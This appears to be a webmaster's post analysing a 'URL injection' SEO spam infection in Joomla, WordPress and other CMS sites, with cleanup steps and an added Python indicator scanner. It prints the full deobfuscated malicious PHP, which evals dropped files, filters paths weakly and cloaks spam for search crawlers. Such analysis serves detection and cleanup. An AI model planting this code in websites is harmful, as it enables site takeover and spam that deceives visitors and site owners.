Just recently I encountered a new (?) version of the spam virus for websites. Google defines it as "URL injection."
Description
Links appear on your site that did not exist and could not exist: you know the structure of the site and its original URLs well, and these bogus URLs clearly differ from them. In particular, the following links appear in the search engines' index:
www.site.ru/?jn=xxxxxxxx
Search and elimination
Yandex Webmaster does not react to them yet, but Google's webmaster tools issue a warning about a possible hack of the site. They also give recommendations for the search, but unfortunately these are quite general, and a targeted search takes time. Antivirus and online site scanners give no results. Only a manual search works.
Option A: Code not obfuscated
- Search the source for who uses the $_GET['jn'] variable and how
- Then follow the code to see what is dropped where (for example: \js\swfupload\plugins\jquery\)
Option B: Code Obfuscated
- Look for a directory whose file names appear after "?jn="
- Look for suspicious executable files such as images/c0nfv.php
- You can also search for paths where files like "/img/icon/thumb/jquery.php" might be
- Check the modification date of the CMS config
- It is recommended to check for the presence (and legitimacy) of base.php files: this is the body of the virus itself, and its code is obfuscated
- Check the date of jquery.php and compare it with the date the virus was detected by Google Webmaster Tools monitoring.
Where it is encountered
- CMS: Joomla, WordPress, DLE, PrestaShop, HostCMS
- Plugins: ImageZoomer, SWFupload, BlockCategories
- There is a high probability of encountering it in almost any plugin that uses jQuery, and in places where the admins never got around to the settings.
The full (non-obfuscated) malicious code is under the cut.
```php
<?php
if (isset($_GET['jn'])) {
    // Silence PHP errors; the option name is reversed to evade simple string searches.
    ini_set(strrev("gnitroper_rorre"), 0);
    // The dropped config (and db.php below) define the randomly named variables used here.
    include "images/c0nfv.php";
    // Weak traversal filter: only the literal '..' is stripped from the requested name.
    $uhvuusgp = str_replace('..', '', $_GET[$qjkx]);
    if (is_file($ftdavmbe . '/' . $uhvuusgp)) {
        header('Content-Type: text/html; charset=windows-1251', false);
        // The requested file from the dropped directory is executed through eval.
        echo eval('?>' . join("", file($ftdavmbe . "/$uhvuusgp")) . '<?');
        die;
    }
}
// Cloaking: the spam page is served only to search-engine crawlers.
if (preg_match("/(yandex|google)/i", $_SERVER['HTTP_USER_AGENT'])) {
    ini_set(strrev("gnitroper_rorre"), 0);
    include "images/c0nfv.php";
    if (is_file($ftdavmbe . "/db.php")) {
        include $ftdavmbe . "/db.php";
        // Derive a stable pseudo-random 3-digit key from the requested host and URI.
        $jxbecpzx = preg_replace("/[0]*$/", "", preg_replace("/\.*/", "", (string)sprintf('%f', hexdec(sha1($_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'])))));
        $iwtcrjis = substr($jxbecpzx, 20, 3);
        if (substr($iwtcrjis, 0, 1) == 0) {
            do {
                $x++;
                $iwtcrjis = substr($jxbecpzx, 20 + $x, 3);
            } while (substr($iwtcrjis, 0, 1) == 0);
        }
        // Include the spam template selected by that key and emit its content in UTF-8.
        include $ftdavmbe . "/" . $iwtcrjisy[$iwtcrjis];
        echo mb_convert_encoding($ohjjpibn[72], 'UTF-8', 'Windows-1251');
    }
}
?>
```
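As an added example (not code from the original post), a small scanner that automates the manual search steps above using the indicators visible in the injected code: PHP files sitting in asset directories, the $_GET['jn'] handler, the reversed error_reporting trick, the reference to c0nfv.php, and an optional modification-time cutoff matching the date of Google's warning. The signature regexes and the asset-directory list are my assumptions, and demo() builds a constructed sample web root rather than scanning a real site.

```python
import os
import re
import tempfile

# Textual indicators taken from the injected code shown on this page.
SIGNATURES = {
    "jn_param": re.compile(r"\$_GET\s*\[\s*['\"]jn['\"]\s*\]"),
    "reversed_error_reporting": re.compile(r"strrev\s*\(\s*['\"]gnitroper_rorre['\"]\s*\)"),
    "eval_of_included_file": re.compile(r"eval\s*\(\s*['\"]\?>['\"]\s*\."),
    "dropper_config": re.compile(r"c0nfv\.php"),
}
# Directory names that normally hold static assets, not PHP (assumed list).
ASSET_DIRS = {"images", "img", "js", "css", "icon", "thumb", "swfupload"}

def scan_file(path):
    """Return the names of the signatures found in one PHP file."""
    with open(path, encoding="latin-1", errors="replace") as fh:
        text = fh.read()
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan_tree(root, modified_after=None):
    """Sorted [(relative_path, [reasons])]; modified_after is an optional UNIX timestamp."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            reasons = scan_file(path)
            if ASSET_DIRS & set(rel.lower().split("/")[:-1]):
                reasons.append("php_in_asset_dir")
            if modified_after is not None and os.path.getmtime(path) > modified_after:
                reasons.append("modified_after_cutoff")
            if reasons:
                findings.append((rel, sorted(reasons)))
    return sorted(findings)

def demo():
    """Constructed sample web root (indicator fragments only, not a working copy of the malware)."""
    root = tempfile.mkdtemp()
    samples = {"index.php": "<?php echo 'hello'; ?>", "images/c0nfv.php": "<?php $f = 1; ?>",
               "js/swfupload/plugins/jquery/jquery.php": "<?php if(isset($_GET['jn']))"
               "{ini_set(strrev(\"gnitroper_rorre\"),0);include \"images/c0nfv.php\";} ?>"}
    for rel, body in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return scan_tree(root)
```

Run scan_tree() against a copy of the web root and review every hit by hand; a PHP file under images/ or js/ with no matching signature can still be a dropped loader such as base.php.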
Causes of hacking
There are most likely three options:
- A directory on the server that is open for writing;
- A vulnerability in the software running the site; as a rule these are free CMSs (content management systems), for example if you are using an outdated, insecure version;
- A compromise through third-party plugins on the site (ones that work with jQuery).